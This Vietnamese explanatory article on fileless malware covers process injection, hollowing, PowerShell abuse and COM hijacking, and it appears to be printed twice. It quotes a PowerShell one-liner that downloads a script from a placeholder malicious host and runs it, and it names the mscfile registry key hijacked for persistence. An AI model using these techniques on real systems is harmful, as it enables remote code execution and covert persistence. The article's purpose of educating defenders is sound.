Khi mã độc không để lại dấu vết
Hãy thử hình dung: một cuộc tấn công mạng diễn ra mà không có bất kỳ file nào được lưu trên ổ cứng, không log, không dấu vết rõ ràng để lần theo. Đó chính là fileless – kỹ thuật khiến các phần mềm antivirus truyền thống hầu như “bất lực”.
Khác với mã độc thông thường, fileless không cần file thực thi. Nó sống trong bộ nhớ (RAM) và khai thác chính công cụ hợp pháp sẵn có như PowerShell, WMI hay Microsoft Office để thực hiện hành vi độc hại. Cách tiếp cận này còn được gọi là “living off the land” – tận dụng tài nguyên hệ thống. Và trong bối cảnh 2025, nó là một trong những mối đe dọa hàng đầu trong an ninh mạng.
Fileless là gì?
Nói ngắn gọn, fileless malware là dạng tấn công không để lại mã độc dưới dạng file trên ổ cứng. Thay vào đó, nó được tiêm trực tiếp vào bộ nhớ của tiến trình hợp pháp – có thể là svchost.exe, chrome.exe, hay một file Word đang chạy. Điều này giúp nó tránh bị phát hiện bởi các công cụ quét file như antivirus.
Bạn có thể hình dung: fileless giống như một tên trộm khéo léo. Hắn không phá cửa, không mang theo đồ nghề. Hắn dùng chính chìa khóa và công cụ trong nhà bạn để hành động – và rời đi mà không để lại dấu vân tay.
Những kỹ thuật fileless phổ biến
Dưới đây là 3 kỹ thuật thường gặp nhất:
1. Memory Injection & Process Hollowing
- Memory Injection: Tiêm shellcode trực tiếp vào bộ nhớ tiến trình hợp pháp (ví dụ explorer.exe) bằng các API như VirtualAlloc, WriteProcessMemory.
- Process Hollowing: Khởi chạy một tiến trình hợp pháp (như notepad.exe) ở trạng thái suspended, thay nội dung bằng mã độc trong bộ nhớ rồi tiếp tục chạy. Về bề ngoài vẫn là Notepad, nhưng bên trong đã thành mã độc.
2. PowerShell – “vũ khí” quen thuộc
PowerShell cho phép tải và chạy mã độc trực tiếp từ mạng:
Invoke-Expression ((New-Object Net.WebClient).DownloadString('https://malicious.com/payload.ps1'))
Không file, không log rõ ràng. Để khó bị phát hiện, kẻ tấn công thường mã hóa hoặc làm rối code, khiến việc phân tích càng khó khăn.
3. COM Hijacking – duy trì quyền kiểm soát
Kỹ thuật này khai thác Windows Registry để “hijack” một COM object. Ví dụ, chỉnh sửa key:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\open\command
Khi người dùng mở Event Viewer, thay vì hoạt động bình thường, nó sẽ chạy một script PowerShell độc hại. Không cần tạo file, nhưng vẫn duy trì được quyền kiểm soát lâu dài.
Fileless tấn công không ồn ào, không để lại dấu vết rõ ràng. Chính vì vậy, nó thách thức mọi phương pháp phòng thủ truyền thống. Để đối phó, các đội ngũ an ninh cần tập trung vào giám sát hành vi, phân tích bộ nhớ và nhận diện những bất thường trong hệ thống, thay vì chỉ dựa vào công cụ antivirus.
Hãy thử hình dung: một cuộc tấn công mạng diễn ra mà không có bất kỳ file nào được lưu trên ổ cứng, không log, không dấu vết rõ ràng để lần theo. Đó chính là fileless – kỹ thuật khiến các phần mềm antivirus truyền thống hầu như “bất lực”.
Khác với mã độc thông thường, fileless không cần file thực thi. Nó sống trong bộ nhớ (RAM) và khai thác chính công cụ hợp pháp sẵn có như PowerShell, WMI hay Microsoft Office để thực hiện hành vi độc hại. Cách tiếp cận này còn được gọi là “living off the land” – tận dụng tài nguyên hệ thống. Và trong bối cảnh 2025, nó là một trong những mối đe dọa hàng đầu trong an ninh mạng.
Fileless là gì?
Nói ngắn gọn, fileless malware là dạng tấn công không để lại mã độc dưới dạng file trên ổ cứng. Thay vào đó, nó được tiêm trực tiếp vào bộ nhớ của tiến trình hợp pháp – có thể là svchost.exe, chrome.exe, hay một file Word đang chạy. Điều này giúp nó tránh bị phát hiện bởi các công cụ quét file như antivirus.
Bạn có thể hình dung: fileless giống như một tên trộm khéo léo. Hắn không phá cửa, không mang theo đồ nghề. Hắn dùng chính chìa khóa và công cụ trong nhà bạn để hành động – và rời đi mà không để lại dấu vân tay.
Những kỹ thuật fileless phổ biến
Dưới đây là 3 kỹ thuật thường gặp nhất:
1. Memory Injection & Process Hollowing
- Memory Injection: Tiêm shellcode trực tiếp vào bộ nhớ tiến trình hợp pháp (ví dụ explorer.exe) bằng các API như VirtualAlloc, WriteProcessMemory.
- Process Hollowing: Khởi chạy một tiến trình hợp pháp (như notepad.exe) ở trạng thái suspended, thay nội dung bằng mã độc trong bộ nhớ rồi tiếp tục chạy. Về bề ngoài vẫn là Notepad, nhưng bên trong đã thành mã độc.
2. PowerShell – “vũ khí” quen thuộc
PowerShell cho phép tải và chạy mã độc trực tiếp từ mạng:
Invoke-Expression ((New-Object Net.WebClient).DownloadString('https://malicious.com/payload.ps1'))
Không file, không log rõ ràng. Để khó bị phát hiện, kẻ tấn công thường mã hóa hoặc làm rối code, khiến việc phân tích càng khó khăn.
3. COM Hijacking – duy trì quyền kiểm soát
Kỹ thuật này khai thác Windows Registry để “hijack” một COM object. Ví dụ, chỉnh sửa key:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\open\command
Khi người dùng mở Event Viewer, thay vì hoạt động bình thường, nó sẽ chạy một script PowerShell độc hại. Không cần tạo file, nhưng vẫn duy trì được quyền kiểm soát lâu dài.
Fileless tấn công không ồn ào, không để lại dấu vết rõ ràng. Chính vì vậy, nó thách thức mọi phương pháp phòng thủ truyền thống. Để đối phó, các đội ngũ an ninh cần tập trung vào giám sát hành vi, phân tích bộ nhớ và nhận diện những bất thường trong hệ thống, thay vì chỉ dựa vào công cụ antivirus.
Bài viết liên quan
Bài viết mới